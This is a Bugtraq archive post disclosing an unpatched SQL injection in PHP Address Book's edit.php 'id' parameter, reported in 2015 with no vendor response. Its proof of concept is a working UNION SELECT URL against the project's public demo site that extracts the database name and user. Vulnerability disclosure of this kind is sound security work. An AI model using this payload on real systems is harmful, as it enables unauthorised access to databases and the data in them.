Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

PHP Address Book SQL Injection Vulnerability

From: Rahul Pratap Singh <techno.rps () gmail com>
Date: Sat, 14 Nov 2015 15:04:41 +0530
## Full Disclosure

#Exploit Title      : PHP Address Book SQL Injection Vulnerability
#Exploit Author     : Rahul Pratap Singh
#Date               : 14/Nov/2015
#Home Page Link     : http://sourceforge.net/projects/php-addressbook/
#Blog Url           : 0x62626262.wordpress.com
#Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
#Status             : Not Patched

1. Description

"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.

2. Proof of Concept

http://php-addressbook.sourceforge.net/demo/edit.php?id=null&apos; union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

## Vendor Response

No reply from vendor

Attachment: signature.asc
Description: OpenPGP digital signature

Previous By Date Next
Previous By Thread Next

Current thread: